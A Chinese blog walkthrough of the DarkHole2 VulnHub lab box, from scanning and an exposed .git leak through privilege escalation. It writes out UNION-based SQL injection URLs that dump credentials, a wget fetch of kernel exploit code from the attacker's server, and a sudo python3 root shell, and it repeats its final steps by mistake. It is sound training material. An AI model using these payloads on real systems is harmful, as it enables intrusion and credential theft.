DarkHole2渗透测试

最新推荐文章于 2024-01-22 23:51:18 发布

Kaylll

最新推荐文章于 2024-01-22 23:51:18 发布

阅读量427

点赞数

文章标签：服务器 git php

本文链接：https://blog.csdn.net/weixin_43769253/article/details/126058887

版权

DarkHole2渗透测试

1.信息搜集

ip信息：

nmap -sP 192.168.93.0/24

在这里插入图片描述

靶机ip：192.168.93.132

2.扫描

端口扫描

 nmap -sS -T4 192.168.93.132

在这里插入图片描述

只有两个端口：80，22

前端页面：

在这里插入图片描述

$[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-H7ZdRpDi-1659083381305)(C:\Users\ykksissocool\AppData\Roaming\Typora\typora-user-images\1658820027386.png)]$

3.漏洞发掘

发现存在git目录泄露：
在这里插入图片描述

下载源代码分析：

wget -r http://192.168.93.132/.git/

这将创建一个名称为 IP 地址的目录。在目录中，它包含递归下载的文件，包括“.git”。

$[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-bsdlMw5s-1659083381307)(C:\Users\ykksissocool\AppData\Roaming\Typora\typora-user-images\1658820349349.png)]$

按如下方式克隆

git clone . testweb

这将创建一个 git 存储库“testweb”，我们可以在其中执行所有 git 操作

在这里插入图片描述

进入config目录查看配置-config.php

在这里插入图片描述

可知数据库名为darkhole_2

查看login.php

在这里插入图片描述

可以看到做了防sql注入

然后git log查看更新

在这里插入图片描述

看到第2次更新时，login.php使用了默认凭证。

因此，我们将 HEAD 切换到该提交，并查看login.php

git checkout a4d900a

在这里插入图片描述

拿到用户名和密码：

lush@admin.com
321

在这里插入图片描述

登录后返回此页面，请求中带参数id，可能存在sql注入

在这里插入图片描述

简单测试后确定存在sql注入

4.漏洞利用

order by猜解表中列数

在这里插入图片描述

爆表名

http://192.168.93.132/dashboard.php?id=-1%27%20union%20select%201,2,3,4,5,group_concat(table_name)%20from%20information_schema.tables%20where%20table_schema=database()%20--+1

在这里插入图片描述

爆字段，因为要进入后台，我们选择爆ssh表字段。

http://192.168.93.132/dashboard.php?id=-1%27%20union%20select%201,2,3,4,5,group_concat(column_name)%20from%20information_schema.columns%20where%20table_name=%27ssh%27%20--+

在这里插入图片描述

爆数据

192.168.93.132/dashboard.php?id=-1' union select 1,2,3,4,5,group_concat(user,0x3a,pass) from ssh  --+1

在这里插入图片描述

ssh登录：

在这里插入图片描述

5.提权

基本信息搜集：

在这里插入图片描述

/tmp目录下有个passwd文件

在这里插入图片描述

查看发现：

在这里插入图片描述

发现linuxkernel存在CVE-2021-3493
（Linux内核版本 < 5.11）

开启web简易服务器上传exp

python -m http.server 8800

使用wget远程下载exp

wget http://192.168.93.1:8800/exploit.c

chmod 777 exploit.c
gcc exploit.c -o exploit

这一步发现找不到gcc命令，靶机没有安装

没关系，我们先编译后再传上去给靶机下载

在这里插入图片描述

执行过后发现并没有用，仔细一看原来此漏洞只对ubantu有影响，😵

看一下历史命令cat .bash_history

发现一条可疑命令

执行后，发现是losy用户权限

在这里插入图片描述

kali上编写反弹shell，并起http服务

在这里插入图片描述

将shell复制到/tmp目录下

在这里插入图片描述

kali开启9999监听
靶机运行命令

在这里插入图片描述

获得losy用户bash

在这里插入图片描述

sudo -l提示需要输入密码，而我们现在还不知道losy用户密码

在这里插入图片描述

发现有su权限，但是需要密码

再次查询历史命令后发现losy用户的密码为gang

ssh登录losy

在这里插入图片描述

sudo -l 查询发现可以使用python3提权

在这里插入图片描述

sudo /usr/bin/python3 -c  "import os;os.system('/bin/bash')"

命令后发现losy用户的密码为gang

ssh登录losy

在这里插入图片描述

sudo -l 查询发现可以使用python3提权

在这里插入图片描述

sudo /usr/bin/python3 -c  "import os;os.system('/bin/bash')"

在这里插入图片描述

Kaylll

关注

0
点赞
踩
3

收藏

觉得还不错? 一键收藏
0
评论
DarkHole2渗透测试

vulnhub靶机DarkHole2渗透记录难度：高
复制链接

扫一扫

DarkHole2渗透测试

DarkHole2渗透测试

1.信息搜集

2.扫描

3.漏洞发掘

4.漏洞利用

5.提权

“相关推荐”对你有帮助么？